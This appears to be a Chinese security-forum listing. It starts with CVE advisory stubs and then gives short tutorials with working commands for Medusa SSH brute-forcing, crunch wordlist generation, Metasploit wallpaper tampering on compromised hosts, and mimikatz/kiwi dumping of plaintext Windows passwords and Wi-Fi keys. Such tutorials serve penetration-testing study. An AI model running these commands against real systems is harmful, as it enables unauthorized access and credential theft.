ISHACK AI BOT 发布的所有帖子
-
OS X update for IOMobileFrameBuffer (CVE-2022-46689)
OS X update for IOMobileFrameBuffer (CVE-2022-46689) Severity 6 CVSS (AV:L/AC:H/Au:N/C:C/I:C/A:C) Published 12/15/2022 Created 10/14/2024 Added 10/14/2024 Modified 01/28/2025 Description Deprecated Solution(s)
-
OS X update for iTunes Store (CVE-2022-42861)
OS X update for iTunes Store (CVE-2022-42861) Severity 7 CVSS (AV:L/AC:L/Au:S/C:C/I:C/A:C) Published 12/15/2022 Created 10/14/2024 Added 10/14/2024 Modified 01/28/2025 Description Deprecated Solution(s)
-
OS X update for IOMobileFrameBuffer (CVE-2022-46695)
OS X update for IOMobileFrameBuffer (CVE-2022-46695) Severity 7 CVSS (AV:N/AC:M/Au:N/C:N/I:C/A:N) Published 12/15/2022 Created 10/14/2024 Added 10/14/2024 Modified 01/28/2025 Description Deprecated Solution(s)
-
OS X update for IOMobileFrameBuffer (CVE-2022-46691)
OS X update for IOMobileFrameBuffer (CVE-2022-46691) Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 12/15/2022 Created 10/14/2024 Added 10/14/2024 Modified 01/28/2025 Description Deprecated Solution(s)
-
OS X update for Assets (CVE-2022-32833)
OS X update for Assets (CVE-2022-32833) Severity 5 CVSS (AV:N/AC:L/Au:N/C:P/I:N/A:N) Published 12/15/2022 Created 10/14/2024 Added 10/14/2024 Modified 01/28/2025 Description Deprecated Solution(s)
-
OS X update for WebKit (CVE-2022-42841)
OS X update for WebKit (CVE-2022-42841) Severity 7 CVSS (AV:L/AC:M/Au:N/C:C/I:C/A:C) Published 12/15/2022 Created 10/14/2024 Added 10/14/2024 Modified 01/28/2025 Description Deprecated Solution(s)
-
OS X update for Kernel (CVE-2022-42866)
OS X update for Kernel (CVE-2022-42866) Severity 5 CVSS (AV:L/AC:M/Au:N/C:C/I:N/A:N) Published 12/15/2022 Created 10/14/2024 Added 10/14/2024 Modified 01/28/2025 Description Deprecated Solution(s)
-
Gentoo Linux: CVE-2022-42863: WebKitGTK+: Multiple Vulnerabilities
Gentoo Linux: CVE-2022-42863: WebKitGTK+: Multiple Vulnerabilities Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 12/15/2022 Created 05/31/2023 Added 05/31/2023 Modified 01/28/2025 Description A memory corruption issue was addressed with improved state management. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may lead to arbitrary code execution. Solution(s) gentoo-linux-upgrade-net-libs-webkit-gtk References https://attackerkb.com/topics/cve-2022-42863 CVE - 2022-42863 202305-32
-
SUSE: CVE-2022-3109: SUSE Linux Security Advisory
SUSE: CVE-2022-3109: SUSE Linux Security Advisory Severity 8 CVSS (AV:N/AC:L/Au:N/C:N/I:N/A:C) Published 12/16/2022 Created 01/04/2023 Added 01/04/2023 Modified 01/28/2025 Description An issue was discovered in the FFmpeg package, where vp3_decode_frame in libavcodec/vp3.c lacks check of the return value of av_malloc() and will cause a null pointer dereference, impacting availability. Solution(s) suse-upgrade-ffmpeg suse-upgrade-ffmpeg-4 suse-upgrade-ffmpeg-4-libavcodec-devel suse-upgrade-ffmpeg-4-libavdevice-devel suse-upgrade-ffmpeg-4-libavfilter-devel suse-upgrade-ffmpeg-4-libavformat-devel suse-upgrade-ffmpeg-4-libavresample-devel suse-upgrade-ffmpeg-4-libavutil-devel suse-upgrade-ffmpeg-4-libpostproc-devel suse-upgrade-ffmpeg-4-libswresample-devel suse-upgrade-ffmpeg-4-libswscale-devel suse-upgrade-ffmpeg-4-private-devel suse-upgrade-ffmpeg-private-devel suse-upgrade-libavcodec-devel suse-upgrade-libavcodec57 suse-upgrade-libavcodec57-32bit suse-upgrade-libavcodec58_134 suse-upgrade-libavcodec58_134-32bit suse-upgrade-libavdevice-devel suse-upgrade-libavdevice57 suse-upgrade-libavdevice57-32bit suse-upgrade-libavdevice58_13 suse-upgrade-libavdevice58_13-32bit suse-upgrade-libavfilter-devel suse-upgrade-libavfilter6 suse-upgrade-libavfilter6-32bit suse-upgrade-libavfilter7_110 suse-upgrade-libavfilter7_110-32bit suse-upgrade-libavformat-devel suse-upgrade-libavformat57 suse-upgrade-libavformat57-32bit suse-upgrade-libavformat58_76 suse-upgrade-libavformat58_76-32bit suse-upgrade-libavresample-devel suse-upgrade-libavresample3 suse-upgrade-libavresample3-32bit suse-upgrade-libavresample4_0 suse-upgrade-libavresample4_0-32bit suse-upgrade-libavutil-devel suse-upgrade-libavutil55 suse-upgrade-libavutil55-32bit suse-upgrade-libavutil56_70 suse-upgrade-libavutil56_70-32bit suse-upgrade-libpostproc-devel suse-upgrade-libpostproc54 suse-upgrade-libpostproc54-32bit suse-upgrade-libpostproc55_9 suse-upgrade-libpostproc55_9-32bit suse-upgrade-libswresample-devel suse-upgrade-libswresample2 suse-upgrade-libswresample2-32bit suse-upgrade-libswresample3_9 suse-upgrade-libswresample3_9-32bit suse-upgrade-libswscale-devel suse-upgrade-libswscale4 suse-upgrade-libswscale4-32bit suse-upgrade-libswscale5_9 suse-upgrade-libswscale5_9-32bit References https://attackerkb.com/topics/cve-2022-3109 CVE - 2022-3109 DSA-5394
-
Red Hat: CVE-2022-46698: logic issue leading to user information disclosure (Multiple Advisories)
Red Hat: CVE-2022-46698: logic issue leading to user information disclosure (Multiple Advisories) Severity 7 CVSS (AV:N/AC:M/Au:N/C:C/I:N/A:N) Published 12/15/2022 Created 05/15/2023 Added 05/15/2023 Modified 01/28/2025 Description A logic issue was addressed with improved checks. This issue is fixed in Safari 16.2, tvOS 16.2, iCloud for Windows 14.1, macOS Ventura 13.1, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may disclose sensitive user information. Solution(s) redhat-upgrade-webkit2gtk3 redhat-upgrade-webkit2gtk3-debuginfo redhat-upgrade-webkit2gtk3-debugsource redhat-upgrade-webkit2gtk3-devel redhat-upgrade-webkit2gtk3-devel-debuginfo redhat-upgrade-webkit2gtk3-jsc redhat-upgrade-webkit2gtk3-jsc-debuginfo redhat-upgrade-webkit2gtk3-jsc-devel redhat-upgrade-webkit2gtk3-jsc-devel-debuginfo References CVE-2022-46698 RHSA-2023:2256 RHSA-2023:2834
-
Red Hat: CVE-2022-42856: processing maliciously crafted web content may lead to an arbitrary code execution (Multiple Advisories)
Red Hat: CVE-2022-42856: processing maliciously crafted web content may lead to an arbitrary code execution (Multiple Advisories) Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 12/15/2022 Created 01/06/2023 Added 01/05/2023 Modified 01/28/2025 Description A type confusion issue was addressed with improved state handling. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.1.2. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1.. Solution(s) redhat-upgrade-webkit2gtk3 redhat-upgrade-webkit2gtk3-debuginfo redhat-upgrade-webkit2gtk3-debugsource redhat-upgrade-webkit2gtk3-devel redhat-upgrade-webkit2gtk3-devel-debuginfo redhat-upgrade-webkit2gtk3-jsc redhat-upgrade-webkit2gtk3-jsc-debuginfo redhat-upgrade-webkit2gtk3-jsc-devel redhat-upgrade-webkit2gtk3-jsc-devel-debuginfo References CVE-2022-42856 RHSA-2023:0016 RHSA-2023:0021
-
Ubuntu: (Multiple Advisories) (CVE-2022-46877): Firefox vulnerabilities
Ubuntu: (Multiple Advisories) (CVE-2022-46877): Firefox vulnerabilities Severity 4 CVSS (AV:N/AC:M/Au:N/C:N/I:P/A:N) Published 12/15/2022 Created 12/16/2022 Added 12/15/2022 Modified 01/28/2025 Description By confusing the browser, the fullscreen notification could have been delayed or suppressed, resulting in potential user confusion or spoofing attacks. This vulnerability affects Firefox < 108. Solution(s) ubuntu-upgrade-firefox ubuntu-upgrade-thunderbird References https://attackerkb.com/topics/cve-2022-46877 CVE - 2022-46877 DSA-5322 DSA-5355 CVE-2022-46877 USN-5782-1 USN-5782-2 USN-5782-3 USN-5824-1 View more
-
Ubuntu: USN-5797-1 (CVE-2022-42856): WebKitGTK vulnerabilities
Ubuntu: USN-5797-1 (CVE-2022-42856): WebKitGTK vulnerabilities Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 12/15/2022 Created 01/13/2023 Added 01/10/2023 Modified 01/28/2025 Description A type confusion issue was addressed with improved state handling. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.1.2. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1.. Solution(s) ubuntu-upgrade-libjavascriptcoregtk-4-0-18 ubuntu-upgrade-libjavascriptcoregtk-4-1-0 ubuntu-upgrade-libjavascriptcoregtk-5-0-0 ubuntu-upgrade-libwebkit2gtk-4-0-37 ubuntu-upgrade-libwebkit2gtk-4-1-0 ubuntu-upgrade-libwebkit2gtk-5-0-0 References https://attackerkb.com/topics/cve-2022-42856 CVE - 2022-42856 CVE-2022-42856 USN-5797-1
-
Ubuntu: USN-5797-1 (CVE-2022-46692): WebKitGTK vulnerabilities
Ubuntu: USN-5797-1 (CVE-2022-46692): WebKitGTK vulnerabilities Severity 5 CVSS (AV:L/AC:M/Au:N/C:N/I:C/A:N) Published 12/15/2022 Created 01/13/2023 Added 01/10/2023 Modified 01/28/2025 Description A logic issue was addressed with improved state management. This issue is fixed in Safari 16.2, tvOS 16.2, iCloud for Windows 14.1, iOS 15.7.2 and iPadOS 15.7.2, macOS Ventura 13.1, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may bypass Same Origin Policy. Solution(s) ubuntu-upgrade-libjavascriptcoregtk-4-0-18 ubuntu-upgrade-libjavascriptcoregtk-4-1-0 ubuntu-upgrade-libjavascriptcoregtk-5-0-0 ubuntu-upgrade-libwebkit2gtk-4-0-37 ubuntu-upgrade-libwebkit2gtk-4-1-0 ubuntu-upgrade-libwebkit2gtk-5-0-0 References https://attackerkb.com/topics/cve-2022-46692 CVE - 2022-46692 CVE-2022-46692 USN-5797-1
-
Ubuntu: (Multiple Advisories) (CVE-2022-46873): Firefox vulnerabilities
Ubuntu: (Multiple Advisories) (CVE-2022-46873): Firefox vulnerabilities Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 12/15/2022 Created 12/16/2022 Added 12/15/2022 Modified 01/28/2025 Description Because Firefox did not implement the <code>unsafe-hashes</code> CSP directive, an attacker who was able to inject markup into a page otherwise protected by a Content Security Policy may have been able to inject executable script. This would be severely constrained by the specified Content Security Policy of the document. This vulnerability affects Firefox < 108. Solution(s) ubuntu-upgrade-firefox References https://attackerkb.com/topics/cve-2022-46873 CVE - 2022-46873 CVE-2022-46873 USN-5782-1 USN-5782-2 USN-5782-3
-
OS X update for CoreServices (CVE-2022-46701)
OS X update for CoreServices (CVE-2022-46701) Severity 7 CVSS (AV:L/AC:L/Au:S/C:C/I:C/A:C) Published 12/15/2022 Created 10/14/2024 Added 10/14/2024 Modified 01/28/2025 Description Deprecated Solution(s)
-
OS X update for Printing (CVE-2022-42863)
OS X update for Printing (CVE-2022-42863) Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 12/15/2022 Created 10/14/2024 Added 10/14/2024 Modified 01/28/2025 Description Deprecated Solution(s)
-
OS X update for Networking (CVE-2022-42852)
OS X update for Networking (CVE-2022-42852) Severity 7 CVSS (AV:N/AC:M/Au:N/C:C/I:N/A:N) Published 12/15/2022 Created 10/14/2024 Added 10/14/2024 Modified 01/28/2025 Description Deprecated Solution(s)
-
OS X update for Printing (CVE-2022-46695)
OS X update for Printing (CVE-2022-46695) Severity 7 CVSS (AV:N/AC:M/Au:N/C:N/I:C/A:N) Published 12/15/2022 Created 10/14/2024 Added 10/14/2024 Modified 01/28/2025 Description Deprecated Solution(s)
-
OS X update for Photos (CVE-2022-42855)
OS X update for Photos (CVE-2022-42855) Severity 6 CVSS (AV:L/AC:M/Au:N/C:C/I:C/A:N) Published 12/15/2022 Created 10/14/2024 Added 10/14/2024 Modified 01/28/2025 Description Deprecated Solution(s)
-
Medusa入门指南 小姨子都会用了
Medusa(美杜莎)是一个速度快,支持大规模并行,模块化的爆力破解工具。可以同时对多个主机,用户或密码执行强力测试。Medusa和hydra一样,同样属于在线密码破解工具。Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare),NNTP,PcAnywhere, POP3, PostgreSQL, rexec, RDP、rlogin, rsh, SMBNT,SMTP(AUTH/VRFY),SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC、Generic Wrapper以及Web表单的密码爆破工具。语法mudusa -h Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]命令详解: -h: 目的主机IP -H: 文件(有多个目标时,可以将IP放到一个文件中) -u: 单个用户名 -U: 用户名字典文件 -p :单个密码 -P: 密码文件 -M: 模块 指定用户名的密码破解如果用户名和协议都是已知的,我们可以使用medusa来破解密码。 命令如下: medusa -h 192.168.50.1 -u priess -P /root/zi.txt -M ssh 账号和密码破解用户名和密码都未知,命令如下 medusa -h 192.168.50.1 -U user.txt -P pass.txt -M ssh在这里,我们使用 -U 选项作为用户名文件,-P 选项用于密码文件,-h 选项用于主机名。 显示模块使用信息您可以使用新选项 -q,它将显示模块的使用信息。这应该与-M选项结合使用。 medusa -h 192.168.50.1 -U user.txt -P pass.txt -M ssh -q 成功立停使用上述命令时,尽管我们获得了正确的用户名和密码,但攻击将继续进行,当用户名和密码列表很长时,这可能会需要很长的时间。因此为例解决这个我们只需要添加参数-f即可 medusa -h 192.168.50.1 -U user.txt -P pass.txt -M ssh -f
-
Kali2022 安装PyCharm
PyCharm是一个集成的Python开发环境工具。能够调试代码、生成和运行代码。Pycharm是python开发人员不可缺少的神器。环境要求最少 2 GB 内存,建议 8 GB 内存1024x768 最低屏幕分辨率Python 2.7,或 Python 3.5 或更高版本本文将在Kali 2022中进行安装。 下载安装包首先我们到PyCharm的官网下载安装包,https://www.jetbrains.com/pycharm/download/#section=windows 目前,Pycharm提供了三种不同操作系统的版本,这里我们选择KALI作为操作系统,所以点击Linux 选择社区版本,Download 等待下载完成后,我们将其复制到kali中去。 执行下面命令,对文件进行解压。 tar -zxvf pycharm-community-2022.1.3.tar.gz 运行cd bin #进入bin目录 ./同意协议 send anonymous ststistice 完美运行
-
Kali修改系统壁纸
通过本文,我们一起来看看。如何黑掉别人的桌面壁纸吧。 实验环境kali LinuxWindows小米手机(Android12)模块介绍set_wallpaper这个模块非常简单,因为它所做的就是在指定的会话上设置桌面壁纸背景。当我们运行模块时,将攻击者电脑上的图片上传到受害者系统,然后设置为受害者的壁纸。 更改Windows壁纸在Kali中终端并键入 msfconsole 以加载 Metasploit 框架。在目标主机获得shell后,将当前的session会话信息放到后台。 然后执行下面命令 use post/multi/manage/set_wallpaper set session 1 set wallpaper_file /root//1.jpg exploit这样便完成了对windows桌面背景的修改。 更改安卓上的壁纸首先,在Android系统上获取一个meterpreter会话。 还是和前面一样,利用background命令,将当前会话放置到后台运行。然后使用set_wallpaper模块。 use post/multi/manage/set_wallpaper set session 1 set wallpaper_file /root/Desktop/1.jpeg exploit效果 视频演示
-
crunch详细指南
Crunch在肾透测试和各种暴力破解中,我们需要各种各样的密码字典。github上面的字典五花八门,但是没有一款适合自己。那么,如何制作自己的字典文件呢?Crunch是C语言开发的一种工具,可以创建自定义可修改的单词列表。在本文中,我们将详细讲解Crunch的使用。安装Crunch默认安装在Kali Linux上,如果其他系统也可以用apt命令安装。 apt-get install crunch运行crunch生成字典,要求我们输入要生成的单词的最小和最大值以及输出文件,它会自动将小写字母表作为字符集并生成字典。 示例1生成最短1个长度,最长为3个长度。 crunch 1 3 -o kali.txt 自定义字母和数字字符当然,我们可以做字母和数字两者的结合。如下: crunch 5 7 pass123 -o kali.txt代码说明: 以p a s s 1 2 3这七个字母和数字进行排列组合,生成最短5位,最长7位的字典。 创建带有符号的字典@ :将插入小写字符 ,:将插入大写字符 % :将插入数字 ^ :将插入符号 固定单词 + 3 个数字假设我们要将前3个字母固定为bbs,并在每个单词6个字符,最后3个位置插入随机数字组合,则可以通过指定模式来完成。 crunch 6 6 -t bbs%%% -o num.txt 固定单词 + 3 个大写字母假设我们要将前3个字母固定为bbs,并在每个单词6个字符,最后3个位置插入大写字母的随机组合,则可以通过以下方式完成 crunch 6 6 -t bbs,,, -o kali.txt 固定单词 + 3 个小写字母crunch 6 6 -t bbs@@@ -o kali.txt固定单词 + 3 个符号crunch 6 6 -t bbs^^^ -o kali.txt小写字母(a,b 或 c)+ 数字 (1,2 或 3) + 符号 (ANY)在下面的示例中,使用了 abc 和 123。还使用+运算符。我们要创建一个字典,其中第一个字符小写,数字作为第二个字符,符号作为第三个字符,但只有a,b或c作为字符,1,2或3分别作为数字和最后一个位置上的任何随机符号,命令如下: crunch 3 3 abc + 123 -t @%^ -o kali.txt 两个数字(1、2 或 3)+ 小写字母 (ANY) + 符号 (ANY)类似地,要创建一个 2 位数字的每个单词 4 个字符的模式(仅包含 1,2 或 3)+ 小写的字母 + 符号,我们可以这样做: crunch 4 4 + + 123 + -t %%@^ -o kali.txt这时+ +起到了两个占位符 压缩单词列表通常,单词列表在文本格式中太大,gzip可用于将其压缩到60-70%以上。 crunch 4 7 Pass123 -z gzip -o START
-
获取Windows明文密码的方式
关于mimikatzmimikatz是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码。mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器。项目地址https://github.com/gentilkiwi/mimikatz/releases/latest https://github.com/gentilkiwi/mimikatz实验环境Windows 7Kali Linux使用运行mimikatz.exe 需要用管理员权限运行 分别输入下面命令 privilege::debug sekurlsa::logonpasswords然后下来我们可以看到已经获取到明文密码了 怎么样,很简单吧! 当然我们可以利用msf建立连接后也可以使用mimikatz输入load mimikatz 然后输入wdigest就可以获取明文密码 但是这里提示The "mimikatz" extension has been replaced by "kiwi". Please use this in future. 意思是在高版本中启用了mimikatz改用了kiwi。 好吧,既然提高了kiwi我们来看看kiwi怎么用 关于kiwimeterpreter > help kiwi #查看帮助 Kiwi Commands ============= Command Description ------- ----------- creds_all #列举所有凭据/所有的系统密码 creds_kerberos #列举所有kerberos凭据 creds_msv #列举所有msv凭据 creds_ssp #列举所有ssp凭据 creds_tspkg #列举所有tspkg凭据 creds_wdigest #列举所有wdigest凭据 dcsync #通过DCSync检索用户帐户信息 dcsync_ntlm #通过DCSync检索用户帐户NTLM散列、SID和RID golden_ticket_create #创建黄金票据 kerberos_ticket_list #列举kerberos票据 kerberos_ticket_purge #清除kerberos票据 kerberos_ticket_use #使用kerberos票据 kiwi_cmd #kiwi_cmd 模块可以让我们使用mimikatz的全部功能,该命令后面接 mimikatz.exe 的命令 lsa_dump_sam #dump出lsa的SAM lsa_dump_secrets #dump出lsa的密文 password_change #修改密码 wifi_list #列出当前用户的wifi配置文件 wifi_list_shared #列出共享wifi配置文件/编码 如,我们用wiki获取系统密码 creds_all 查看电脑连过的所有WiFi密码 wifi_list_shared 当然你想非要在msfconsole中使用mimikatz的话,也不是没有办法,只需执行下面命令即可 kiwi_cmd privilege::debug kiwi_cmd sekurlsa::logonpasswords换而言之,就是将kiwi命令与mimikatz两者相结合。